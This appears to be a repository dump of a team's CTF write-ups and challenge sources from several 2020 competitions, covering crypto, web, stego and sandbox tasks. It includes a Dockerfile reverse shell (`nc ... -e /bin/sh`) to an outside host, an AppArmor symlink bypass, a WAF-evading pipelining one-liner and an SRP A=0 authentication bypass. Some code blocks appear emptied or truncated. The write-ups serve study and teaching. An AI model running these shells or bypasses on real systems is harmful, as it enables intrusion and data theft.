39 | It's simply taken directly into the computations. 40 | The issue here is similar to `invalid key` attacks. 41 | By using some special value, we can trick server into creating shared secret / authentication challenge which can be bypassed without knowing the token. 42 | 43 | If we look again at: 44 | 45 | ```python 46 | S = pow(A * pow(v, u, N), b, N) 47 | ``` 48 | 49 | It should be pretty obvious that if we were to send `A = 0` the value of `S` will also become `0`, regardless of all other parameters. 50 | 51 | ## Solver 52 | 53 | We can just take the provided client, set `A = 0` and `S = 0` and run it to get back the flag: `BCTF{y0u_w0uldnt_impl3m3nt_y0ur_0wn_crypt0}` 54 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/711/README.md: -------------------------------------------------------------------------------- 1 | # 7-11 (stegano, 100p, 138 solved) 2 | 3 | ## Description 4 | 5 | In the task we get a [7 zip archive](challenge.7z) and there are 2 flags hidden there. 6 | For the second part see `7-12` writeup. 7 | 8 | ## Archive analysis 9 | 10 | ### ZIP content 11 | 12 | We start off by simply checking what's in the archive, and there is one file `password.txt` with: 13 | 14 | ``` 15 | _ _ _ __ _ 16 | __ _(_)_ _____ _ __ ___ ___ | |_| |__ ___ / _| | __ _ __ _ 17 | / _` | \ \ / / _ \ | '_ ` _ \ / _ \ | __| '_ \ / _ \ | |_| |/ _` |/ _` | 18 | | (_| | |\ V / __/ | | | | | | __/ | |_| | | | __/ | _| | (_| | (_| | 19 | \__, |_| \_/ \___|___|_| |_| |_|\___|___\__|_| |_|\___|___|_| |_|\__,_|\__, | 20 | |___/ |_____| |_____| |_____| |___/ 21 | 22 | ``` 23 | 24 | So we have some password `give_me_the_flag`, now we just need to use it somewhere. 25 | It's interesting that this archive is so big (151KB) and has only a small file inside... 26 | 27 | If we peek inside via hexeditor or run `binwalk` we can see that there is another 7zip archive glued to the first one. 28 | 29 | ### Second archive 30 | 31 | We can cut-out the second [archive](challenge2.7z) and unpack it using the provided password. 32 | From this we get the first flag: `tstlss{next_header_offset_is_a_nice_feature}` which is also a hint for second stage, and also input files for the second stage. 33 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/711/challenge.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/711/challenge.7z -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/711/challenge2.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/711/challenge2.7z -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/712/fixed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/712/fixed.png -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/712/raw_out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/712/raw_out.png -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/BabypadV2/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import socketserver 3 | from secrets import flag 4 | import struct 5 | 6 | # We implemented a true RNG which hands us cryptographically secure double-precision 7 | # floats measured directly from our quantum flux generator. 8 | import trng 9 | 10 | 11 | def to_bytes(gen): 12 | for value in gen: 13 | yield from struct.pack("d", value) 14 | 15 | 16 | def xor(a, b): 17 | for _a, _b in zip(a, b): 18 | yield _a ^ _b 19 | 20 | class ThreadingTDPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): 21 | pass 22 | 23 | class Handler(socketserver.BaseRequestHandler): 24 | def handle(self): 25 | keystream = to_bytes(trng.keystream()) 26 | while True: 27 | count = int(self.request.recv(4)) 28 | 29 | for _ in range(count): 30 | ct = bytes(xor(flag, keystream)) 31 | self.request.sendall(ct) 32 | 33 | self.request.close() 34 | 35 | 36 | if __name__ == "__main__": 37 | HOST, PORT = "0.0.0.0", 1337 38 | 39 | with ThreadingTDPServer((HOST, PORT), Handler) as server: 40 | server.serve_forever() 41 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/README.md: -------------------------------------------------------------------------------- 1 | # Tasteless CTF 2020 2 | 3 | Team: BitK, XeR, SakiiR, SIben, terjanq, shalom 4 | 5 | ### Table of contents 6 | 7 | * [7-11 (stegano)](711) 8 | * [7-12 (stegano)](712) 9 | * [BabypadV2 (crypto)](BabypadV2) 10 | * [Petition (crypto/zajebiste)](petition) 11 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/petition/Challenge.java: -------------------------------------------------------------------------------- 1 | import java.math.BigInteger; 2 | import java.security.spec.DSAPublicKeySpec; 3 | import java.security.KeyFactory; 4 | import java.security.Signature; 5 | import java.util.Random; 6 | import java.util.Scanner; 7 | import java.util.Base64; 8 | import java.io.File; 9 | 10 | public class Challenge { 11 | public static void main(String[] args) throws Exception { 12 | 13 | // Petition group params 14 | var p = new BigInteger("1732afa753c06fd916345a525ede89ba9d78a0a8b", 16); 15 | var q = new BigInteger("b9957d3a9e037ec8b1a2d292f6f44dd4ebc50545", 16); 16 | var g = new BigInteger("4"); 17 | 18 | // Read input 19 | System.out.println("We heard some people may be interested in seeing certain flags."); 20 | System.out.println("If you can get a petition signed by at least 100 people, we will reveal our flag."); 21 | System.out.println("Please submit your petition:"); 22 | var petition = Base64.getDecoder().decode(new Scanner(System.in).next()); 23 | var message = "We want to see the flag!".getBytes(); 24 | 25 | for (int i = 0; i < 100; i++) { 26 | 27 | // Create a new key 28 | BigInteger x; 29 | do { 30 | x = new BigInteger(q.bitLength(), new Random()); 31 | } while (q.compareTo(x) <= 0); 32 | var y = g.modPow(x, p); 33 | var publicKeySpec = new DSAPublicKeySpec(y, p, q, g); 34 | var keyFactory = KeyFactory.getInstance("DSA"); 35 | var publicKey = keyFactory.generatePublic(publicKeySpec); 36 | 37 | // Verify signature 38 | var signature = Signature.getInstance("SHA1withDSA"); 39 | signature.initVerify(publicKey); 40 | signature.update(message); 41 | if (!signature.verify(petition)) { 42 | System.out.println("This petition looks fraudulent!"); 43 | return; 44 | } 45 | } 46 | 47 | System.out.println("OK, this has been signed by at least 100 people!"); 48 | System.out.println(new Scanner(new File("flag.txt")).nextLine()); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/README.md: -------------------------------------------------------------------------------- 1 | # Balsn CTF 2020 2 | 3 | Team: BitK, johncool, Posix, SakiiR, Sebbb, shalom, SIben, XeR 4 | 5 | ### Table of contents 6 | 7 | * [TPC (web)](tpc) 8 | * [L5D (web)](l5d) 9 | * [Welcome2BalsnCTF (web)](welcome2balsnctf) 10 | * [The Woven Web (web)](the_woven_web) 11 | * [Windows XP Media Player (web)](windows_xp_media_player) 12 | * [Transformer: The Guardian Knight (misc)](transformer) 13 | * [The Last Bitcon (misc)](last_bitcon) 14 | * [Show your Patience and Intelligence II (misc)](patience2) 15 | * [babyrev (re)](babyrev) 16 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/last_bitcon/README.md: -------------------------------------------------------------------------------- 1 | # The Last Bitcon - Balsn CTF 2020 (misc, 238p, 50 solved) 2 | ## Introduction 3 | 4 | This challenge consists of a single Python script. 5 | The script is a proof-of-work. It generates a prefix and asks for a string that, 6 | once hashed in `sha256`, starts with 200 bits set to 0. 7 | 8 | ## Fuzzing 9 | The script does not look vulnerable, but it has to be. 10 | A bash one-liner was used to send random bytes (from `/dev/urandom`) to see how 11 | the remote service behaves. 12 | ```shell 13 | % (head -c $((0x80)) /dev/urandom; cat) | nc the-last-bitcoin.balsnctf.com 7123 14 | 15 | sha256(GJbkiuJabiZpRkMA + ???) == 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000(200)... 16 | 17 | ??? = 18 | There you go: 19 | BALSN{Taiwan_can_help_solve_sha256} 20 | ``` 21 | 22 | **Flag**: `BALSN{Taiwan_can_help_solve_sha256}` 23 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/the_woven_web/README.md: -------------------------------------------------------------------------------- 1 | # The Woven Web (web, 766p, 6 solves) 2 | 3 | The Woven Web is a client-side web challenge. 4 | An endpoint is provided to make a headless chrome browse a user-specified page. 5 | The flag is stored in a `FLAG` constant in the server-side code. 6 | 7 | It is possible to download a file in the headless browser by making the browser go to the following page: 8 | 9 | ```html 10 | 11 | 14 | ``` 15 | 16 | The file will be downloaded and stored in `/home/user/Downloads/` 17 | It can then be access via the `file://` schema. 18 | This file can include the file containing the flag with ` 41 | 42 | 45 | ``` -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/tpc/files/challenge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-14-BalsnCTF/tpc/files/challenge.png -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/tpc/files/object-containing-flag.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-14-BalsnCTF/tpc/files/object-containing-flag.tar.gz -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/transformer/README.md: -------------------------------------------------------------------------------- 1 | # Transformer: The Guardian Knight - Balsn CTF 2020 (misc, 626p, 10 solved) 2 | ## Introduction 3 | 4 | This challenge implements a web server in NodeJS. 5 | 6 | This web server sends a flag : 7 | ```javascript 8 | const server = http.createServer((req, res) => { 9 | res.writeHead(200, { 'Content-Type': 'text/plain' }); 10 | res.end(`The flag is ${flag}.`); 11 | }); 12 | ``` 13 | 14 | There is a Web-Application Firewall that prevents the flag from being sent : 15 | ```javascript 16 | class WAF extends Transform { 17 | _transform (data, encoding, callback) { 18 | data = data.toString('ascii').replace(/BALSN{([^}]*)/g, (m, c) => 19 | 'BALSN{' + Array(c.length).fill('REDACTED_').join('').slice(0, c.length) 20 | ) 21 | callback(null, data) 22 | } 23 | }; 24 | ``` 25 | 26 | ## Attack 27 | 28 | HTTP/1.1 supports requests pipelining, e.g. it is possible to send multiple 29 | requests before the server sends a response. 30 | 31 | Answering to a lot of requests will fill an internal buffer on the server. The 32 | WAF will then read from this buffer. Since only a fixed number of bytes will be 33 | read by the WAF, it is possible to fill this buffer up to a point where the WAF 34 | will read an incomplete flag. The filter will thus not mask the flag. 35 | 36 | ```shell 37 | yes $'GET / HTTP/1.1\r\n\r' | nc waf.balsnctf.com 8889 \ 38 | | fgrep flag \ 39 | | fgrep -v REDACTED 40 | ``` 41 | 42 | **Flag**: `BALSN{!+-WTF_is_this_WAF-+!}` 43 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/welcome2balsnctf/files/upload_95073691eadf0992593e82c3b59faeea.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-14-BalsnCTF/welcome2balsnctf/files/upload_95073691eadf0992593e82c3b59faeea.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/README.md: -------------------------------------------------------------------------------- 1 | # Dragon CTF 2020 2 | 3 | Team: BitK, Posix, SakiiR, Sebbb, Shalom, SIben, XeR, mastho 4 | 5 | ### Table of contents 6 | 7 | * [Scratchpad (web)](scratchpad) 8 | * [Harmony Chat (web)](harmony_chat) 9 | * [RetroZeit (re)](retrozeit) 10 | * [Bit Flip 1 (crypto)](bitflip1) 11 | * [Bit Flip 3 (crypto)](bitflip3) 12 | * [Heap-Hop (Pwning)](heap-hop) 13 | * [AppArmor2 (Sandbox)](apparmor2) 14 | * [Look up the flag (Network)](lookup_the_flag) 15 | * [CoolNAME Checker (Network)](coolname_checker) 16 | * [babyshell (Miscellaneous)](babyshell) 17 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/apparmor2/README.md: -------------------------------------------------------------------------------- 1 | # AppArmor2 - Dragon CTF 2020 (Sandbox, 421p, 7 solved) 2 | 3 | ## Introduction 4 | AppArmor2 is a sandbox task. 5 | 6 | A remote server executes user-provided Docker containers with a specific 7 | AppArmor ruleset which prevents from reading `/flag*`: 8 | ``` 9 | # The line below (+ profile name, + install comments at bottom) is only difference from the original file 10 | deny /flag* rwklx, 11 | ``` 12 | 13 | The rule prevents (`deny`) the file from being read (`r`), written (`w`), locked 14 | (`k`), linked (`l`) or executed (`x`). 15 | 16 | The flag is mounted as `/flag-XXXX` with X being random hexadecimal digits. It 17 | cannot be read because of the AppArmor rule. 18 | 19 | ## Vulnerability 20 | If the target of a mount operation already exists and is a symbolic link, the 21 | flag will be mounted as the target of this link. 22 | 23 | It is possible to create a container that contains a link for possible flag to 24 | redirect it to `/pwned`. 25 | 26 | The flag will be mounted as `/pwned`. Since this file is not restricted by the 27 | AppArmor rule, the flag will be readable with a simple `cat /pwned` command. 28 | 29 | Creating an image and pushing it to the Gitlab repository is out of the scope of 30 | this write-up. 31 | 32 | **Flag**: `DrgnS{4e77cd33ffb0c7802b39303f7452fd90}` 33 | 34 | ## Appendices 35 | ### Dockerfile 36 | ```Dockerfile 37 | FROM busybox 38 | RUN printf 'ln -s /pwned /flag-%04x\n' $(seq 65535) | sh 39 | CMD ["nc", "xer.fr", "12345", "-e", "/bin/sh"] 40 | ``` 41 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/harmony_chat/files/harmony.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/harmony_chat/files/harmony.zip -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/harmony_chat/files/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/harmony_chat/files/main.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/retrozeit/retrozeit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/retrozeit/retrozeit -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/flag.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/home.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/img-src.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/img-src.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/main.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "task", 3 | "private": true, 4 | "scripts": { 5 | "serve": "ts-node serve.ts", 6 | "setup": "ts-node setup.ts", 7 | "watch": "ts-node watch.ts" 8 | }, 9 | "dependencies": { 10 | "@types/bcrypt": "^3.0.0", 11 | "@types/body-parser": "^1.19.0", 12 | "@types/csurf": "^1.9.36", 13 | "@types/express": "^4.17.8", 14 | "@types/express-session": "^1.17.0", 15 | "@types/http-errors": "^1.8.0", 16 | "@types/massive": "^5.4.3", 17 | "@types/morgan": "^1.9.2", 18 | "@types/selenium-webdriver": "^4.0.10", 19 | "bcrypt": "^5.0.0", 20 | "body-parser": "^1.19.0", 21 | "csurf": "^1.11.0", 22 | "debug": "^4.2.0", 23 | "express": "^4.17.1", 24 | "express-session": "^1.17.1", 25 | "http-errors": "^1.8.0", 26 | "massive": "^6.6.1", 27 | "memorystore": "^1.6.4", 28 | "morgan": "^1.10.0", 29 | "pg": "^8.4.2", 30 | "pug": "^3.0.0", 31 | "selenium-webdriver": "^4.0.0-alpha.7", 32 | "ts-node": "^9.0.0", 33 | "typescript": "^4.1.2" 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/routes/index.ts: -------------------------------------------------------------------------------- 1 | import * as express from 'express'; 2 | import utils from '../utils'; 3 | 4 | 5 | const router = express.Router(); 6 | 7 | router.get('/', (_req, res) => res.render('index')); 8 | router.get( 9 | '/logout', (req, res) => utils.signOut(req, () => res.redirect('/'))); 10 | router.get('/login', (_req, res) => res.render('login', {title: 'Log in'})); 11 | router.post('/login', async (req, res) => { 12 | const user = await res.locals.db.users.findOne({name: req.body.name}); 13 | if (!user || !utils.checkPassword(user, req.body.password)) { 14 | return res.render( 15 | 'login', {title: 'Log in', error: 'Invalid username or password'}); 16 | } 17 | 18 | utils.signIn(req, user); 19 | res.redirect('/notes'); 20 | }); 21 | 22 | router.get( 23 | '/register', (_req, res) => res.render('register', {title: 'Register'})); 24 | router.post('/register', async (req, res) => { 25 | const regexp = /^\s*$/; 26 | let errors = []; 27 | 28 | if (regexp.test(req.body.name)) { 29 | errors.push(`Username can't be empty.`); 30 | } 31 | 32 | if (regexp.test(req.body.password)) { 33 | errors.push(`Password can't be empty.`); 34 | } 35 | 36 | if (req.body.password !== req.body.password_confirmation) { 37 | errors.push(`Password doesn't match the confirmation.`); 38 | } 39 | 40 | if (errors.length !== 0) { 41 | return res.render('register', {title: 'Register', error: errors.join(' ')}); 42 | } 43 | 44 | try { 45 | await res.locals.db.users.insert( 46 | {name: req.body.name, password: utils.hashPassword(req.body.password)}); 47 | } catch (err) { 48 | return res.render( 49 | 'register', {title: 'Register', error: 'User already exists'}); 50 | } 51 | 52 | return res.redirect('/login'); 53 | }); 54 | 55 | export default router; 56 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/schema.sql: -------------------------------------------------------------------------------- 1 | create extension if not exists pgcrypto; 2 | create table if not exists users (id UUID PRIMARY KEY DEFAULT gen_random_uuid(), name TEXT UNIQUE NOT NULL, password TEXT NOT NULL); 3 | create table if not exists notes (id UUID PRIMARY KEY DEFAULT gen_random_uuid(), user_id UUID NOT NULL REFERENCES users(id) ON DELETE CASCADE, title TEXT NOT NULL, content TEXT NOT NULL, favourite BOOLEAN DEFAULT FALSE); 4 | create table if not exists reports (id UUID UNIQUE NOT NULL REFERENCES notes(id) ON DELETE CASCADE); 5 | create index if not exists index_notes_on_user_ids on notes(user_id) include (title, content); 6 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/setup.ts: -------------------------------------------------------------------------------- 1 | import * as assert from 'assert'; 2 | import * as massive from 'massive'; 3 | import utils from './utils'; 4 | 5 | assert.ok(process.env.ADMIN_PASSWORD, "ADMIN_PASSWORD is not set"); 6 | assert.ok(process.env.FLAG, "FLAG is not set"); 7 | assert.ok(process.env.DB, "DB is not set"); 8 | 9 | async function main() { 10 | const db = await massive(process.env.DB); 11 | const user = await db.users.insert({name: 'admin', password: utils.hashPassword(process.env.ADMIN_PASSWORD)}).catch(console.log); 12 | await db.notes.insert({user_id: user.id, title: "Flag", content: process.env.FLAG, favourite: true}); 13 | } 14 | 15 | main(); 16 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/static/star.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/utils.ts: -------------------------------------------------------------------------------- 1 | import { hashSync, compareSync, genSaltSync } from 'bcrypt'; 2 | import { Request, Response, NextFunction } from 'express'; 3 | 4 | export default class Utils { 5 | static hashPassword(password: string): string { 6 | return hashSync(password, genSaltSync()); 7 | } 8 | 9 | static checkPassword(user: any, password: string): boolean { 10 | return compareSync(password, user.password); 11 | } 12 | 13 | static signIn(req: Request, user: any) { 14 | req.session.userId = user.id; 15 | } 16 | 17 | static signOut(req: Request, next: NextFunction) { 18 | req.session.destroy(next); 19 | } 20 | 21 | static checkAuth(req: Request, res: Response, next: NextFunction): any { 22 | if (!req.session.userId) { 23 | return res.redirect('/login'); 24 | } 25 | next(); 26 | } 27 | } 28 | 29 | 30 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/edit.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block title 4 | | Edit Note 5 | 6 | block content 7 | form.form(action=`/notes/${note.id}/edit`, method='POST') 8 | input(type='hidden', name='_csrf', value=csrfToken) 9 | div.mb-3 10 | input.form-control(type='text', name='title', placeholder='Title', value=note.title) 11 | div.mb-3 12 | textarea.form-control(name='content', placeholder='Content', rows=20) #{note.content} 13 | div.mb-3 14 | div.form-check 15 | input.form-check-input(name='favourite', type='checkbox', id='favourite', checked=!!note.favourite) 16 | label.form-check-label(for='favourite') Favourite 17 | div.mb-3 18 | button.btn.btn-lg.btn-primary.btn-block(type='submit') Update 19 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/error.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | h1= status 5 | h2= message 6 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/index.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | .jumbotron.jumbotron-fluid 5 | .container 6 | h1.display-4 Scratchpad 7 | p.lead Welcome to a simple scratchpad! 8 | p Report any bugs you find. Best reports will be rewarded. 9 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/layout.pug: -------------------------------------------------------------------------------- 1 | doctype html 2 | html(lang="en") 3 | head 4 | meta(charset="utf-8") 5 | title 6 | block title 7 | | Scratchpad 8 | link(rel='stylesheet', href='/static/bootstrap.min.css', integrity='sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2', crossorigin='anonymous') 9 | body 10 | header 11 | nav.navbar.navbar-dark.bg-dark.navbar-expand-lg 12 | a.navbar-brand(href='/') Scratchpad 13 | 14 | if session && session.userId 15 | ul.navbar-nav.mr-auto 16 | li.nav-item 17 | a.nav-link(href='/notes') Your Notes 18 | li.nav-item 19 | a.nav-link(href='/notes/new') Add Note 20 | li.nav-item 21 | a.nav-link(href='/logout') Logout 22 | form.form-inline(action='/notes') 23 | input.form-control.mr-sm-2(type="search", name="q", placeholder="Search", value=query) 24 | else 25 | ul.navbar-nav.mr-auto 26 | li.nav-item 27 | a.nav-link(href='/register') Register 28 | li.nav-item 29 | a.nav-link(href='/login') Login 30 | 31 | main.py-5.bg-light(role='main') 32 | .container 33 | if error 34 | .alert.alert-danger= error 35 | 36 | if notice 37 | .alert.alert-success= notice 38 | 39 | block content 40 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/login.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | form.form-signin(action='/login', method='POST') 5 | input(type='hidden', name='_csrf', value=csrfToken) 6 | .mb-3 7 | input.form-control(id='name', type='text', name='name', placeholder='Username') 8 | .mb-3 9 | input.form-control(id='password', type='password', name='password', placeholder='Password') 10 | .mb-3 11 | button.btn.btn-lg.btn-primary.btn-block(id='submit', type='submit') Login 12 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/new.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block title 4 | | New Note 5 | 6 | block content 7 | form.form(action='/notes/new', method='POST') 8 | input(type='hidden', name='_csrf', value=csrfToken) 9 | div.mb-3 10 | input.form-control(type='text', name='title', placeholder='Title') 11 | div.mb-3 12 | textarea.form-control(name='content', placeholder='Content', rows=20) 13 | div.mb-3 14 | div.form-check 15 | input.form-check-input(name='favourite', type='checkbox', id='favourite') 16 | label.form-check-label(for='favourite') Favourite 17 | div.mb-3 18 | button.btn.btn-lg.btn-primary.btn-block(type='submit') Add 19 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/note.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | append title 4 | = " - " 5 | = note.title 6 | 7 | block content 8 | .row 9 | .col-lg-8 10 | h1.mt-4 11 | if note.favourite 12 | img(src="/static/star.svg") 13 | =note.title 14 | 15 | div !{note.content} 16 | 17 | div 18 | a.btn.btn-link(href=`/notes/${note.id}/edit`) Edit 19 | 20 | form.inline(method='POST', action=`/notes/${note.id}/delete`) 21 | input(type='hidden', name='_csrf', value=csrfToken) 22 | button.btn.btn-link(type='submit') Delete 23 | 24 | form.inline(method='POST', action=`/notes/${note.id}/report`) 25 | input(type='hidden', name='_csrf', value=csrfToken) 26 | button.btn.btn-link(type='submit') Report 27 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/notes.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block title 4 | | My Notes 5 | 6 | block content 7 | if query 8 | p Search for "#{query}" returned !{notes.length} results. 9 | if notes.length > 0 10 | each note in notes 11 | .row 12 | .col-lg-8 13 | a(href=`/notes/${note.id}`) 14 | h1.mt-4 15 | if note.favourite 16 | img(src="/static/star.svg") 17 | =note.title 18 | else if !query 19 | .row 20 | .col-lg-8 21 | p You need to create some notes first! 22 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/views/register.pug: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | form.form-signin(action='/register', method='POST') 5 | input(type='hidden', name='_csrf', value=csrfToken) 6 | .mb-3 7 | input.form-control(type='text', name='name', placeholder='Username') 8 | .mb-3 9 | input.form-control(type='password', name='password', placeholder='Password') 10 | .mb-3 11 | input.form-control(type='password', name='password_confirmation', placeholder='Repeat your password') 12 | .mb-3 13 | button.btn.btn-lg.btn-primary.btn-block(type='submit') Register 14 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/scratchpad/files/sources/watch.ts: -------------------------------------------------------------------------------- 1 | import * as assert from 'assert'; 2 | import * as massive from 'massive'; 3 | import {Builder, By} from 'selenium-webdriver'; 4 | import * as firefox from 'selenium-webdriver/firefox'; 5 | import {UserPromptHandler} from 'selenium-webdriver/lib/capabilities'; 6 | import {URL} from 'url'; 7 | 8 | assert.ok(process.env.SITE_URL, 'SITE_URL is not set'); 9 | assert.ok(process.env.ADMIN_PASSWORD, 'ADMIN_PASSWORD is not set'); 10 | assert.ok(process.env.DB, 'DB is not set'); 11 | 12 | function timeout(delay: number) { 13 | return new Promise(resolve => setTimeout(resolve, delay)); 14 | } 15 | 16 | async function checkReport(id: string, baseUrl: string, adminPassword: string) { 17 | console.log(`Checking ${new URL(`/notes/${id}`, baseUrl)}`); 18 | const driver = new Builder() 19 | .forBrowser('firefox') 20 | .setFirefoxOptions( 21 | new firefox.Options().headless().setAlertBehavior( 22 | UserPromptHandler.DISMISS) as firefox.Options) 23 | .build(); 24 | try { 25 | console.log('Logging in'); 26 | await driver.get(new URL('/login', baseUrl).toString()); 27 | let el = await driver.findElement(By.id('name')); 28 | await el.sendKeys('admin'); 29 | el = await driver.findElement(By.id('password')); 30 | await el.sendKeys(adminPassword); 31 | el = await driver.findElement(By.id('submit')); 32 | await el.click(); 33 | 34 | console.log('Visiting report'); 35 | await driver.get(new URL(`/notes/${id}`, baseUrl).toString()); 36 | await driver.sleep(30 * 1000); 37 | } finally { 38 | await driver.quit(); 39 | } 40 | } 41 | 42 | async function main() { 43 | const db = await massive(process.env.DB); 44 | 45 | while (true) { 46 | const reports = await db.reports.destroy(); 47 | console.log(`Got ${reports.length} reports`); 48 | for (let report of reports) { 49 | await checkReport( 50 | report.id, process.env.SITE_URL, process.env.ADMIN_PASSWORD) 51 | .catch(console.log); 52 | } 53 | await timeout(5000); 54 | } 55 | } 56 | 57 | main(); 58 | -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/README.md: -------------------------------------------------------------------------------- 1 | # DefCamp CTF 2020 (as r5) 2 | 3 | Team: Shalom, nazywam, XeR, Posix, mastho 4 | 5 | ### Table of contents 6 | 7 | * [Why XOR (crypto)](xor) 8 | * [Bro64 (crypto)](bro64) 9 | * [yopass-go (re)](yopass) 10 | * [stripped-go (re)](stripped) 11 | * [secret-reverse (re)](secret) 12 | * [modern login (re)](modern) 13 | * [basic coms (forensics)](basiccoms) 14 | * [t3am_vi3w3r (forensics)](team) 15 | * [notor (forensics)](notor) 16 | * [spy-agency (forensics)](spy) 17 | * [hunting into the wild (forensics)](hunting) 18 | * [inorder (misc)](inorder) 19 | * [alien inclusion (web)](alien) 20 | * [broken login (web)](broken) 21 | * [http-for-pros (web)](pros) 22 | * [stug reference (stegano)](stug) 23 | -------------------------------------------------------------------------------- /2020-12-05-DefCampCTF/alien/README.md: -------------------------------------------------------------------------------- 1 | # Alient inclusion (web, 50p, 149 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | Keep it local and you should be fine. The flag is in /var/www/html/flag.php. 7 | 8 | Flag format: CTF{sha256} 9 | ``` 10 | 11 | In the task we get access to a simple webpage. 12 | 13 | ## Task analysis 14 | 15 | Webpage displays the source: 16 | 17 | ```php 18 | we need to guess what algorithm was used to encrypt the data, and decrypt the flag. 20 | A classic example of a terrible task design. 21 | 22 | ## Solution 23 | 24 